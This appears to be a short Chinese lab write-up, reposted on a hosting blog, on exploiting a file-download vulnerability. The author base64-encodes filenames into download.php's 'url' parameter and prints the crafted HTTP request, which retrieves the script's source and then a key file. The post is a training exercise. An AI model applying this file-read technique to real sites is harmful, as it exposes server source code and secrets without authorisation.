溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊(cè)×
其他方式登錄
點(diǎn)擊 登錄注冊(cè) 即表示同意《億速云用戶服務(wù)條款》

文件下載漏洞練習(xí)(一)

發(fā)布時(shí)間:2020-08-03 07:43:47 來源:網(wǎng)絡(luò) 閱讀:1818 作者:Alyoyojie 欄目:安全技術(shù)

(1)打開網(wǎng)頁(yè)
文件下載漏洞練習(xí)(一)
(2)同樣的先抓下包
文件下載漏洞練習(xí)(一)

我們注意到:
url=Y2hvdWJhZ3VhaS5tcDM 還有/download.php

先解碼看看是什么
文件下載漏洞練習(xí)(一)
是個(gè)文件名
文件下載漏洞練習(xí)(一)
(3)我們?cè)囍鴮⑵涮鎿Q成、download.php
文件下載漏洞練習(xí)(一)

GET /download.php?url=ZG93bmxvYWQucGhw= HTTP/1.1
Host: e2ad76b4d4b6d6ed.yunyansec.com
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://e2ad76b4d4b6d6ed.yunyansec.com/
Accept-Language: zh-CN,zh;q=0.9
Connection: close

(4)文件下載成功,打開后發(fā)現(xiàn)還可以有hereiskey.php下載

文件下載漏洞練習(xí)(一)

同樣先編碼
文件下載漏洞練習(xí)(一)
得到key
文件下載漏洞練習(xí)(一)

向AI問一下細(xì)節(jié)

免責(zé)聲明:本站發(fā)布的內(nèi)容(圖片、視頻和文字)以原創(chuàng)、轉(zhuǎn)載和分享為主,文章觀點(diǎn)不代表本網(wǎng)站立場(chǎng),如果涉及侵權(quán)請(qǐng)聯(lián)系站長(zhǎng)郵箱:is@yisu.com進(jìn)行舉報(bào),并提供相關(guān)證據(jù),一經(jīng)查實(shí),將立刻刪除涉嫌侵權(quán)內(nèi)容。

AI